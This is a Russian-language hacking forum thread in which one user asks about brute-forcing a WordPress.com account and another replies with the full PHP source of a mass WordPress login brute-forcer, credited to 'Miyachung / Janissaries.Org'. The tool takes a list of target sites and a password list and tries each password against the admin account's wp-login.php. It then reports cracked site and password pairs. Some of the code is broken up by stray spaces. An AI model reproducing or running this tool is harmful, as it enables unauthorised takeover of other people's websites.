Есть ли у кого опыт по бруту акка на сайт.вордпресс.ком ?
PoliGroS
27.02.2014, 01:53
PHP:
function yaz(yazi,div,ex){var d = document.get ElementById(div);d.innerHTML = yazi;if(ex == "temiz"){var g = document.getElementById("durum");g.innerHTML = "[+] Brute force başlıyor";}}function kaydet(yazi,div){var d = document. getElementById(div);d.innerHTML += yazi;}w0rdpre ss brute forcer - Janissaries.Org | Coded by Miyachung';if(iss et($_POST['start'])){$brute = new brute();$site_list = $_FILES["liste"]["tmp_name"];$site_list = file_get_contents($site_list);$sit e_list = explode("rn",$site_list);$password_list = $_FILES["password"]["tmp_name"];$password_list = file_get_contents($password_li st);$password_list = explode("n",$password_list);$toplam = count($ site_list);$kalan = count($site_list); $tamamlanan = 0;$passay = count($password_ list); echo "---------------------------------------------------------------------
"; echo "[+] Toplam site: ".$kalan."
"; echo "[+] Toplam password: ".$passay."
"; echo "[+] Coded by Mi |
"; echo "[+] Special Thanks : burtay
"; echo "---------------------------------------------------------------------
"; echo ""; echo ""; echo ""; echo ""; echo "
Düşenler:
"; foreach(array_filter($site_list) as $si te) { $site=trim($site); if(! preg_match('/http/',$site)) $site = "http://".$site; echo "yaz('[+] Denenen Site: $site','denenen','temiz');"; if(!$brute->check($site)) { echo "yaz('[!] Durum: Wordpress değil es geçildi','durum' );"; usleep(1000000); continue; } $kalan--; $tamamlanan++; echo "yaz('[+] Kalan siteler: $kalan','kalan');"; echo "yaz('[+] Tamamlanan : $tamamlanan / $toplam','tamamlanan');"; foreach(array_filter($password_li st) as $password) { $time1 = time(); $password=trim ($password); echo "yaz('[!] Denenen şifre: $password','durum');"; $sonuc = $b rute->post($site,$password); $founded = null; if(preg_match('/wordpress_logged_in/',$sonuc) and preg_match('/Location/',$sonuc)) { $founde d = true; $time2 = time(); $sure = ($time2-$time1); echo "yaz('[!!!] Şifre bulundu!','durum');"; usleep(1000000); e cho "kaydet('---------------------------------------------------------------------
[+] Site: $site
[+] Password: $password
[+] Kırılma suresi: $sure
[+] Coded by Miyachung | janissaries.org
---------------------------------------------------------------------
','dusenler');"; break; } else { $founde d = false; } } if(!$founded){echo "yaz('[-] Şifre bulunamadı','durum');";} } } else { e cho ' Site List :
Password List :
'; } echo ""; // ----------------------------- CLASS --------------------------- class brute{public function che ck($url){$curl = curl_init();curl_setopt($curl,C URLOPT_RETURNTRANSFER,true);curl_setopt($curl,CURL OPT_URL,$url);curl_setopt($curl,CURLOPT_FOLLOWLOCA TION,true);curl_setopt($curl,CURLOPT_CONNECTTIMEOU T,20);curl_setopt($curl,CURLOPT_TIMEOUT,20);$data = curl_exec($curl);if(preg_match('/wp-content/',$data)){return true;}else{return false;}}publi c function post($url,$password){$curl = curl_i nit();curl_setopt($curl,CURLOPT_RETURNTRANSFER,1); curl_setopt($curl,CURLOPT_URL,$url."/wp-login.php");curl_setopt($curl,CURLOPT_POST,1);curl_setopt($c url,CURLOPT_POSTFIELDS,"log=admin&pwd=$password&redirect_to=".urlencode($url.'/wp-admin/')."&testcookie=1");curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1);curl _setopt($curl,CURLOPT_HEADER,1);curl_setopt($curl, CURLOPT_CONNECTTIMEOUT,20);curl_setopt($curl,CURLO PT_TIMEOUT,20);curl_setopt($curl,CURLOPT_COOKIEJAR ,'cookie.txt');curl_setopt($curl,CURLOPT_COOKIEFIL E,'cookie.txt');$exec=curl_exec($curl);curl_close( $curl);return $exec;}}?>
Use*
http://127.0.0.1/BruteForce.php
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot